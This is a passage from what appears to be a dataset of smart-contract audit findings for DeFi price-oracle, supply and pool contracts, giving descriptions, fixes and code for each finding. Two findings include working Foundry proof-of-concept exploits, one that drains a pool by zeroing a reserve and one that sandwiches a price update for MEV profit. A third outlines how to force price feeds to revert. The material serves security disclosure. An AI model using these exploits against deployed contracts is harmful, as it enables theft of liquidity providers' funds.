enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n\\nAs you can see above, on L237 it gets the list of non-zero prices. If the length of this list is smaller than 3, it assumes that a median price cannot be calculated and returns first non-zero price. This is wrong. If the number of non-zero prices is 2 and they are deviated, it has to return median value. 
The `_getMedianPrice` function called on L253 is as follows.\\n```\\n function _getMedianPrice(uint256[] memory prices_) internal pure returns (uint256) {\\n uint256 pricesLen = prices_.length;\\n\\n // If there are an even number of prices, return the average of the two middle prices\\n if (pricesLen % 2 == 0) {\\n uint256 middlePrice1 = prices_[pricesLen / 2 - 1];\\n uint256 middlePrice2 = prices_[pricesLen / 2];\\n return (middlePrice1 + middlePrice2) / 2;\\n }\\n\\n // Otherwise return the median price\\n // Don't need to subtract 1 from pricesLen to get midpoint index\\n // since integer division will round down\\n return prices_[pricesLen / 2];\\n }\\n```\\n\\nAs you can see, the median value can be calculated from two values. This problem exists at `getMedianPrice` function as well.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\nчFirst, `SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` function has to be rewritten as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in 
place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n- if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n+ if (nonZeroPrices.length < 2) return firstNonZeroPrice;\\n\\n // rest of code\\n }\\n```\\n\\nSecond, `SimplePriceFeedStrategy.sol#getMedianPrice` has to be modified as following.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n- if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n+ if (nonZeroPricesLen < 2) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\nчWhen the length of `nonZeroPrices` is 2 and they are deviated, it returns first non-zero value, not median value. 
It causes incorrect calculation results.ч```\n function getMedianPriceIfDeviation(\n uint256[] memory prices_,\n bytes memory params_\n ) public pure returns (uint256) {\n // Misconfiguration\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\n\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\n\n // Return 0 if all prices are 0\n if (nonZeroPrices.length == 0) return 0;\n\n // Cache first non-zero price since the array is sorted in place\n uint256 firstNonZeroPrice = nonZeroPrices[0];\n\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\n\n uint256[] memory sortedPrices = nonZeroPrices.sort();\n\n // Get the average and median and abort if there's a problem\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\n uint256 averagePrice = _getAveragePrice(sortedPrices);\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\n\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\n uint256 deviationBps = abi.decode(params_, (uint256));\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\n revert SimpleStrategy_ParamsInvalid(params_);\n\n // Check the deviation of the minimum from the average\n uint256 minPrice = sortedPrices[0];\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\n\n // Check the deviation of the maximum from the average\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\n\n // Otherwise, return the first non-zero value\n return firstNonZeroPrice;\n }\n```\n -Price calculation can be manipulated by intentionally reverting some of price feeds.чmediumчPrice calculation module 
iterates through available price feeds for the requested asset, gather prices of non-revert price feeds and then apply strategy on available prices to calculate final asset price. By abusing this functionality, an attacker can let some price feeds revert to get advantage from any manipulated price feed.\\nHere we have some methods that attackers can abuse to intentionally revert price feeds.\\nUniswapV3 price feed UniswapV3Price.sol#L210-214\\n```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n\\nIn UniswapV3 price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it from UniswapV3's callback methods.\\nBalancer price feed BalancerPoolTokenPrice.sol#L388 BalancerPoolTokenPrice.sol#487 BalancerPoolTokenPrice.sol#599 BalancerPoolTokenPrice.sol#748\\n```\\n// Prevent re-entrancy attacks\\nVaultReentrancyLib.ensureNotInVaultContext(balVault);\\n```\\n\\nIn BalancerPool price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it in the middle of Balancer action.\\nBunniToken price feed BunniPirce.sol#L155-160\\n```\\n_validateReserves(\\n _getBunniKey(token),\\n lens,\\n params.twapMaxDeviationsBps,\\n params.twapObservationWindow\\n);\\n```\\n\\nIn BunniToken price feed, it validates reserves and reverts if it doesn't satisfy deviation. Since BunniToken uses UniswapV3, this can be intentionally reverted by calling it from UniswapV3's mint callback.\\n\\nUsually for ERC20 token prices, above 3 price feeds are commonly used combined with Chainlink price feed, and optionally with `averageMovingPrice`. There are another two points to consider here:\\nWhen average moving price is used, it is appended at the end of the price array. 
OlympusPrice.v2.sol#L160\\n```\\nif (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n```\\n\\nIn price calculation strategy, first non-zero price is used when there are 2 valid prices: `getMedianPriceIfDeviation` - SimplePriceFeedStrategy.sol#L246 `getMedianPrice` - SimplePriceFeedStrategy.sol#L313 For `getAveragePrice` and `getAveragePriceIfDeviation`, it uses average price if it deviates.\\n\\nBased on the information above, here are potential attack vectors that attackers would try:\\nWhen Chainlink price feed is manipulated, an attacker can disable all three above price feeds intentionally to get advantage of the price manipulation.\\nWhen Chainlink price feed is not used for an asset, an attacker can manipulate one of above 3 spot price feeds and disable other ones.\\nWhen `averageMovingPrice` is used and average price strategy is applied, the manipulation effect becomes half: $\\frac{(P + \\Delta X) + (P)}{2} = P + \\frac{\\Delta X}{2}, P=Market Price, \\Delta X=Manipulated Amount$чFor the cases above that price feeds being intentionally reverted, the price calculation itself also should revert without just ignoring it.чAttackers can disable some of price feeds as they want with ease, they can get advantage of one manipulated price feed.ч```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n -getReservesByCategory() when useSubmodules =true and submoduleReservesSelector=bytes4(0) will revertчmediumчin `getReservesByCategory()` Lack of check `data.submoduleReservesSelector!=\"\"` when call `submodule.staticcall(abi.encodeWithSelector(data.submoduleReservesSelector));` will revert\\nwhen `_addCategory()` if `useSubmodules==true`, `submoduleMetricSelector` must not empty and `submoduleReservesSelector` can empty 
(bytes4(0))\\nlike \"protocol-owned-treasury\"\\n```\\n _addCategory(toCategory(\"protocol-owned-treasury\"), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n\\nbut when call `getReservesByCategory()` , don't check `submoduleReservesSelector!=bytes4(0)` and direct call `submoduleReservesSelector`\\n```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n // If category requires data from submodules, count all submodules and their sources.\\n len = (data.useSubmodules) ? submodules.length : 0;\\n\\n// rest of code\\n\\n for (uint256 i; i < len; ) {\\n address submodule = address(_getSubmoduleIfInstalled(submodules[i]));\\n (bool success, bytes memory returnData) = submodule.staticcall(\\n abi.encodeWithSelector(data.submoduleReservesSelector)\\n );\\n```\\n\\nthis way , when call like `getReservesByCategory(toCategory(\"protocol-owned-treasury\")` will revert\\nPOC\\nadd to `SUPPLY.v1.t.sol`\\n```\\n function test_getReservesByCategory_includesSubmodules_treasury() public {\\n _setUpSubmodules();\\n\\n // Add OHM/gOHM in the treasury (which will not be included)\\n ohm.mint(address(treasuryAddress), 100e9);\\n gohm.mint(address(treasuryAddress), 1e18); // 1 gOHM\\n\\n // Categories already defined\\n\\n uint256 expectedBptDai = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_DAI_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n uint256 expectedBptOhm = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_OHM_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n\\n // Check reserves\\n SPPLYv1.Reserves[] memory reserves = moduleSupply.getReservesByCategory(\\n toCategory(\"protocol-owned-treasury\")\\n );\\n }\\n```\\n\\n```\\n forge test -vv --match-test test_getReservesByCategory_includesSubmodules_treasury\\n\\nRunning 1 test for src/test/modules/SPPLY/SPPLY.v1.t.sol:SupplyTest\\n[FAIL. 
Reason: SPPLY_SubmoduleFailed(0xeb502B1d35e975321B21cCE0E8890d20a7Eb289d, 0x0000000000000000000000000000000000000000000000000000000000000000)] test_getReservesByCategory_includesSubmodules_treasury() (gas: 4774197\n```\nч```\n function getReservesByCategory(\n Category category_\n ) external view override returns (Reserves[] memory) {\n// rest of code\n\n\n CategoryData memory data = categoryData[category_];\n uint256 categorySubmodSources;\n // If category requires data from submodules, count all submodules and their sources.\n// Remove the line below\n len = (data.useSubmodules) ? submodules.length : 0;\n// Add the line below\n len = (data.useSubmodules && data.submoduleReservesSelector!=bytes4(0)) ? submodules.length : 0;\n```\nчsome categories can't get `Reserves`ч```\n _addCategory(toCategory("protocol-owned-treasury"), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\n```\n -Balancer LP valuation methodologies use the incorrect supply metricчmediumчIn various Balancer LP valuations, totalSupply() is used to determine the total LP supply. However, this is not the appropriate method for determining the supply. Instead, getActualSupply should be used. Depending on which pool implementation and how much LP is deployed, the valuation can be much too high or too low. Note that the RBS pricing is dependent on this metric. 
It could lead to RBS being deployed at incorrect prices.\\nAuraBalancerSupply.sol#L345-L362\\n```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo value each LP token the contract divides the valuation of the pool by the total supply of LP. This in itself is correct, however the totalSupply method for a variety of Balancer pools doesn't accurately reflect the true LP supply. If we take a look at a few Balancer pools we can quickly see the issue:\\nThis pool shows a max supply of 2,596,148,429,273,858 whereas the actual supply is 6454.48. In this case the LP token would be significantly undervalued. If a sizable portion of the reserves are deployed in an affected pool the backing per OHM would appear to the RBS system to be much lower than it really is. 
As a result it can cause the RBS to deploy its funding incorrectly, potentially selling/buying at a large loss to the protocol.чUse a try-catch block to always query getActualSupply on each pool to make sure supported pools use the correct metric.чPool LP can be grossly under/over valuedч```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n -Possible incorrect price for tokens in Balancer stable pool due to amplification parameter updateчmediumчIncorrect price calculation of tokens in StablePools if amplification factor is being updated\\nThe amplification parameter used to calculate the invariant can be in a state of update. In such a case, the current amplification parameter can differ from the amplificaiton parameter at the time of the last invariant calculation. 
The current implementaiton of `getTokenPriceFromStablePool` doesn't consider this and always uses the amplification factor obtained by calling `getLastInvariant`\\n```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n\\n```\\n // @audit the amplification parameter can be updated\\n function startAmplificationParameterUpdate(uint256 rawEndValue, uint256 endTime) external authenticate {\\n\\n // @audit for calculating the invariant the current amplification factor is obtained by calling _getAmplificationParameter()\\n function _onSwapGivenIn(\\n SwapRequest memory swapRequest,\\n uint256[] memory balances,\\n uint256 indexIn,\\n uint256 indexOut\\n ) internal virtual override whenNotPaused returns (uint256) {\\n (uint256 currentAmp, ) = _getAmplificationParameter();\\n uint256 amountOut = StableMath._calcOutGivenIn(currentAmp, balances, indexIn, indexOut, swapRequest.amount);\\n return amountOut;\\n }\\n```\\nчUse the latest amplification factor by callling the `getAmplificationParameter` functionчIn case the amplification parameter of a pool is being updated by the admin, wrong price will be calculated.ч```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification 
factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n -Incorrect deviation calculation in isDeviatingWithBpsCheck functionчmediumчThe current implementation of the `isDeviatingWithBpsCheck` function in the codebase leads to inaccurate deviation calculations, potentially allowing deviations beyond the specified limits.\\nThe function `isDeviatingWithBpsCheck` checks if the deviation between two values exceeds a defined threshold. This function incorrectly calculates the deviation, considering only the deviation from the larger value to the smaller one, instead of the deviation from the mean (or TWAP).\\n```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? 
_isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n\\nThe function then call `_isDeviating` to calculate how much the smaller value is deviated from the bigger value.\\n```\\n function _isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return ((value0_ - value1_) * deviationMax_) / value0_ > deviationBps_;\\n }\\n```\\n\\nThe function `isDeviatingWithBpsCheck` is usually used to check how much the current value is deviated from the TWAP value to make sure that the value is not manipulated. Such as spot price and twap price in UniswapV3.\\n```\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n baseInQuotePrice,\\n baseInQuoteTWAP,\\n params.maxDeviationBps,\\n DEVIATION_BASE\\n )\\n ) {\\n revert UniswapV3_PriceMismatch(address(params.pool), baseInQuoteTWAP, baseInQuotePrice);\\n }\\n```\\n\\nThe issue is isDeviatingWithBpsCheck is not check the deviation of current value to the TWAP but deviation from the bigger value to the smaller value. This leads to an incorrect allowance range for the price, permitting deviations that exceed the acceptable threshold.\\nExample:\\nTWAP price: 1000 Allow deviation: 10%.\\nThe correct deviation calculation will use deviation from the mean. 
The allow price will be from 900 to 1100 since:\\n|1100 - 1000| / 1000 = 10%\\n|900 - 1000| / 1000 = 10%\\nHowever the current calculation will allow the price from 900 to 1111\\n(1111 - 1000) / 1111 = 10%\\n(1000 - 900) / 1000 = 10%\\nEven though the actual deviation of 1111 to 1000 is |1111 - 1000| / 1000 = 11.11% > 10%чTo accurately measure deviation, the isDeviating function should be revised to calculate the deviation based on the mean value: `| spot value - twap value | / twap value`.чThis miscalculation allows for greater deviations than intended, increasing the vulnerability to price manipulation and inaccuracies in Oracle price reporting.ч```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n -Pool can be drained if there are no LP_FEESчhighчThe pool can be depleted because swaps allow the withdrawal of the entire balance, resulting in a reserve of 0 for a specific asset. When an asset's balance reaches 0, the PMMPricing algorithm incorrectly estimates the calculation of output amounts. Consequently, the entire pool can be exploited using a flash loan by depleting one of the tokens to 0 and then swapping back to the pool whatever is received.\\nFirstly, as indicated in the summary, selling quote/base tokens can lead to draining the opposite token in the pool, potentially resulting in a reserve of 0. 
Consequently, the swapping mechanism permits someone to entirely deplete the token balance within the pool. In such cases, the calculations within the pool mechanism become inaccurate. Therefore, swapping back to whatever has been initially purchased will result in acquiring more tokens, further exacerbating the depletion of the pool.\\nAllow me to provide a PoC to illustrate this scenario:\\n```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves \"0\".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the \"_amount\" already which will make the quote token reserve \"0\"\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log(\"Received quote amount by hippo\", receivedQuoteAmount);\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! 
That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log(\"Received base amount by hippo\", receivedBaseAmount);\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log(\"Profit for attack\", receivedBaseAmount - _amount);\\n }\\n```\\n\\nTest results and logs:чDo not allow the pools balance to be 0 or do not let LP_FEE to be 0 in anytime.чPool can be drained, funds are lost. Hence, high. Though, this can only happen when there are no \"LP_FEES\". However, when we check the default settings of the deployment, we see here that the LP_FEE is set to 0. 
So, it is ok to assume that the LP_FEES can be 0.ч```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves \"0\".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the \"_amount\" already which will make the quote token reserve \"0\"\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log(\"Received quote amount by hippo\", receivedQuoteAmount);\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! 
That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log(\"Received base amount by hippo\", receivedBaseAmount);\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log(\"Profit for attack\", receivedBaseAmount - _amount);\\n }\\n```\\n -Adjusting \"_I_\" will create a sandwich opportunity because of price changesчmediumчAdjusting the value of \"I\" directly influences the price. This can be exploited by a MEV bot, simply by trading just before the \"adjustPrice\" function and exiting right after the price change. The profit gained from this operation essentially represents potential losses for the liquidity providers who supplied liquidity to the pool.\\nAs we can see in the docs, the \"I\" is the \"i\" value in here and it is directly related with the output amount a trader will receive when selling a quote/base token:\\nSince the price will change, the MEV bot can simply sandwich the tx. 
Here an example how it can be executed by a MEV bot:\\n```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log(\"Base target initial\", gsp._BASE_TARGET_());\\n console.log(\"Quote target initial\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve initial\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve initial\", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n console.log(\"Received base tokens\", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. 
Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n\\nTest result and logs:\\nAfter the sandwich, we can see that the MEV bot's DAI amount exceeds its initial DAI balance (profits). Additionally, the reserves for both base and quote tokens are less than the initial 10 tokens deposited by the tapir (only LP). The profit gained by the MEV bot essentially translates to a loss for the tapir.\\nAnother note on this is that even though the `adjustPrice` called by MAINTAINER without getting frontrunned, it still creates a big price difference which requires immediate arbitrages. Usually these type of parameter changes that impacts the trades are setted by time via ramping to mitigate the unfair advantages that it can occur during the price update.чAcknowledge the issue and use private RPC's to eliminate front-running or slowly ramp up the \"I\" so that the arbitrage opportunity is fairчч```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log(\"Base target initial\", gsp._BASE_TARGET_());\\n console.log(\"Quote target initial\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve initial\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve initial\", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens 
